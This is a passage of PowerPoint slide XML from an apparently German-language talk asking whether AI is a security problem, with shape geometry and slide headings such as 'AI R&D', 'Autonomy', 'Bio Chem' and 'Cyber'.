                    <a:pt x="2404018" y="269903"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="338260" y="189573"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="245317" y="446957"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="431200" y="446957"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1408353" y="168636"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1408353" y="635494"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1469732" y="635494"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1624121" y="635494"/>
                    <a:pt x="1715247" y="549006"/>
                    <a:pt x="1715247" y="402075"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1715247" y="256063"/>
                    <a:pt x="1624121" y="168636"/>
                    <a:pt x="1469732" y="168636"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="3116056" y="135153"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3234145" y="135153"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3234145" y="283019"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3343908" y="283019"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3343908" y="384390"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3234145" y="384390"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3234145" y="558285"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3233231" y="619662"/>
                    <a:pt x="3243486" y="634537"/>
                    <a:pt x="3285320" y="635479"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3344847" y="635479"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3344847" y="736848"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3284381" y="736848"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3167206" y="736848"/>
                    <a:pt x="3116056" y="690343"/>
                    <a:pt x="3116056" y="580595"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3116056" y="384390"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3049091" y="384390"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3049091" y="283019"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3116056" y="283019"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="2833452" y="95151"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2954359" y="95151"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2954359" y="220706"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2833452" y="220706"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1967060" y="95151"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2087965" y="95151"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2087965" y="220706"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1967060" y="220706"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="275065" y="67826"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="401442" y="67826"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="625402" y="635588"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="677400" y="635588"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="677400" y="736879"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="437686" y="736879"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="437686" y="635588"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="501792" y="635588"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="468335" y="545452"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="209085" y="545452"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="175639" y="635588"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="239765" y="635588"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="239765" y="736879"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="736879"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="635588"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="52059" y="635588"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="3936902" y="67265"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4119164" y="67265"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4119164" y="635494"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4182422" y="635494"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4182422" y="736863"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3930378" y="736863"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3930378" y="635494"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4001074" y="635494"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4001074" y="168636"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3936902" y="168636"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1221438" y="67265"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1475304" y="67265"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1593431" y="67265"/>
                    <a:pt x="1673403" y="91441"/>
                    <a:pt x="1736636" y="147236"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1804540" y="206761"/>
                    <a:pt x="1839860" y="293249"/>
                    <a:pt x="1839860" y="402075"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1839860" y="431821"/>
                    <a:pt x="1837085" y="461600"/>
                    <a:pt x="1831511" y="489482"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1811977" y="580610"/>
                    <a:pt x="1763607" y="649456"/>
                    <a:pt x="1686412" y="692212"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1631559" y="722902"/>
                    <a:pt x="1564597" y="736863"/>
                    <a:pt x="1475304" y="736863"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1221438" y="736863"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1221438" y="635494"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1285595" y="635494"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1285595" y="168636"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1221438" y="168636"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="750838" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="832594" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="832594" y="368900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="935759" y="368900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="935759" y="456258"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="627228" y="456258"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="627228" y="368900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="730401" y="368900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="730401" y="99437"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="625402" y="140311"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="597510" y="669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latin typeface="A1 Sans" pitchFamily="2" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17441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385BDFDE-61CC-3600-9530-80A370B31641}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1937538" y="609944"/>
            <a:ext cx="8316924" cy="5638112"/>
            <a:chOff x="1937538" y="440668"/>
            <a:chExt cx="8316924" cy="5638112"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="6" name="Grafik 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{31E289EE-9697-BF74-43FB-D1A6CC6689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1953" y="440668"/>
              <a:ext cx="4568093" cy="4568093"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="Textfeld 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{55B931F6-67E8-A7AE-8A00-683B2A6BDF51}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1937538" y="4509120"/>
              <a:ext cx="8316924" cy="1569660"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0" anchor="ctr">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-GB" sz="9600" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx2"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                </a:rPr>
                <a:t>AI</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-GB" sz="9600" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent1"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                </a:rPr>
                <a:t>?</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Textplatzhalter 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D06C49D-9FFF-20CA-3CDF-489912992700}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="18"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10498725" y="6532548"/>
            <a:ext cx="1266532" cy="273600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="122697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2A7CF-8581-3E07-6A54-77586E0D208B}"/>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3549C04-7FC0-1315-BBFB-B30D3D38D9F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="694467" y="1718283"/>
            <a:ext cx="10800000" cy="3409200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t>Wird AI ein sicherheitsrelevantes Problem?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Grafik 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{64EF8ABB-3B1E-AFDC-2FA0-EB91630991FD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10480550" y="6545129"/>
            <a:ext cx="1268078" cy="268247"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="313003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64EDF-BB2F-A13C-A38A-65E895B7AD7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99E7803-9D4D-7250-3CFB-9178233A7BEB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="694467" y="1718283"/>
            <a:ext cx="10800000" cy="3409200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="de-AT" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" sz="3200" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" b="1" dirty="0"/>
              <a:t>  Ist</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t> AI ein sicherheitsrelevantes Problem?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Grafik 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{106ED848-7420-E590-D3DA-C360635BF1EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10480550" y="6545129"/>
            <a:ext cx="1268078" cy="268247"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="356280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chseck 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9C62D951-9C29-655A-75FC-2E0FF691B41E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2819635" y="692696"/>
            <a:ext cx="2534129" cy="2196245"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 2160000"/>
              <a:gd name="connsiteY0" fmla="*/ 936000 h 1872000"/>
              <a:gd name="connsiteX1" fmla="*/ 532752 w 2160000"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 1872000"/>
              <a:gd name="connsiteX2" fmla="*/ 1627248 w 2160000"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 1872000"/>
              <a:gd name="connsiteX3" fmla="*/ 2160000 w 2160000"/>
              <a:gd name="connsiteY3" fmla="*/ 936000 h 1872000"/>
              <a:gd name="connsiteX4" fmla="*/ 1627248 w 2160000"/>
              <a:gd name="connsiteY4" fmla="*/ 1872000 h 1872000"/>
              <a:gd name="connsiteX5" fmla="*/ 532752 w 2160000"/>
              <a:gd name="connsiteY5" fmla="*/ 1872000 h 1872000"/>
              <a:gd name="connsiteX6" fmla="*/ 0 w 2160000"/>
              <a:gd name="connsiteY6" fmla="*/ 93600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00" h="1872000">
                <a:moveTo>
                  <a:pt x="0" y="936000"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="532752" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1627248" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2160000" y="936000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1627248" y="1872000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="532752" y="1872000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="936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200" b="1" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>AI</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="de-DE" sz="5200" b="1" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="de-DE" sz="5200" b="1" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>R&amp;D</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Sechseck 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B88C439D-8D19-0D18-01EF-4EB8A45B9026}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6838237" y="692696"/>
            <a:ext cx="2534128" cy="2196244"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 2160000"/>
              <a:gd name="connsiteY0" fmla="*/ 936000 h 1872000"/>
              <a:gd name="connsiteX1" fmla="*/ 532752 w 2160000"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 1872000"/>
              <a:gd name="connsiteX2" fmla="*/ 1627248 w 2160000"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 1872000"/>
              <a:gd name="connsiteX3" fmla="*/ 2160000 w 2160000"/>
              <a:gd name="connsiteY3" fmla="*/ 936000 h 1872000"/>
              <a:gd name="connsiteX4" fmla="*/ 1627248 w 2160000"/>
              <a:gd name="connsiteY4" fmla="*/ 1872000 h 1872000"/>
              <a:gd name="connsiteX5" fmla="*/ 532752 w 2160000"/>
              <a:gd name="connsiteY5" fmla="*/ 1872000 h 1872000"/>
              <a:gd name="connsiteX6" fmla="*/ 0 w 2160000"/>
              <a:gd name="connsiteY6" fmla="*/ 93600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00" h="1872000">
                <a:moveTo>
                  <a:pt x="0" y="936000"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="532752" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1627248" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2160000" y="936000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1627248" y="1872000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="532752" y="1872000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="936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200" b="1" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Auto-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="5200" b="1" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>nomy</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="5200" b="1" dirty="0">
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Sechseck 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BEA5D2C9-1346-0345-38CE-1C329B5C5520}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6838237" y="3969059"/>
            <a:ext cx="2522801" cy="2196245"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 2160000"/>
              <a:gd name="connsiteY0" fmla="*/ 936000 h 1872000"/>
              <a:gd name="connsiteX1" fmla="*/ 532752 w 2160000"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 1872000"/>
              <a:gd name="connsiteX2" fmla="*/ 1627248 w 2160000"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 1872000"/>
              <a:gd name="connsiteX3" fmla="*/ 2160000 w 2160000"/>
              <a:gd name="connsiteY3" fmla="*/ 936000 h 1872000"/>
              <a:gd name="connsiteX4" fmla="*/ 1627248 w 2160000"/>
              <a:gd name="connsiteY4" fmla="*/ 1872000 h 1872000"/>
              <a:gd name="connsiteX5" fmla="*/ 532752 w 2160000"/>
              <a:gd name="connsiteY5" fmla="*/ 1872000 h 1872000"/>
              <a:gd name="connsiteX6" fmla="*/ 0 w 2160000"/>
              <a:gd name="connsiteY6" fmla="*/ 93600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00" h="1872000">
                <a:moveTo>
                  <a:pt x="0" y="936000"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="532752" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1627248" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2160000" y="936000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1627248" y="1872000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="532752" y="1872000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="936000"/>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t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:br>
              <a:rPr lang="de-DE" sz="1100" b="1" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="de-DE" sz="5200" b="1" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Bio</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="de-DE" sz="5200" b="1" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="de-DE" sz="5200" b="1" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Chem</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="5200" b="1" dirty="0">
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Sechseck 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{354DBDB9-0907-1F2E-EEC9-9891CB5764AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2819636" y="3969059"/>
            <a:ext cx="2534129" cy="2196245"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 2160000"/>
              <a:gd name="connsiteY0" fmla="*/ 936000 h 1872000"/>
              <a:gd name="connsiteX1" fmla="*/ 532752 w 2160000"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 1872000"/>
              <a:gd name="connsiteX2" fmla="*/ 1627248 w 2160000"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 1872000"/>
              <a:gd name="connsiteX3" fmla="*/ 2160000 w 2160000"/>
              <a:gd name="connsiteY3" fmla="*/ 936000 h 1872000"/>
              <a:gd name="connsiteX4" fmla="*/ 1627248 w 2160000"/>
              <a:gd name="connsiteY4" fmla="*/ 1872000 h 1872000"/>
              <a:gd name="connsiteX5" fmla="*/ 532752 w 2160000"/>
              <a:gd name="connsiteY5" fmla="*/ 1872000 h 1872000"/>
              <a:gd name="connsiteX6" fmla="*/ 0 w 2160000"/>
              <a:gd name="connsiteY6" fmla="*/ 93600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00" h="1872000">
                <a:moveTo>
                  <a:pt x="0" y="936000"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="532752" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1627248" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2160000" y="936000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1627248" y="1872000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="532752" y="1872000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="936000"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="DA291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200" b="1" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Cyber</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="5200" b="1" dirty="0">
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Textplatzhalter 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0EBDFCD1-1657-B7B8-AAA8-DB444B944627}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="18"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10498725" y="6532548"/>
            <a:ext cx="1266532" cy="273600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="245097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6F617-A0F9-4D3E-BE99-E2635B29E523}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-24680" y="0"/>
            <a:ext cx="12097344" cy="4401108"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>In 5 Jahren wird sich Cybersicherheit grundlegend geändert haben</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Textfeld 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F0FF3E64-A0CE-1138-973B-DF50953ECD02}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
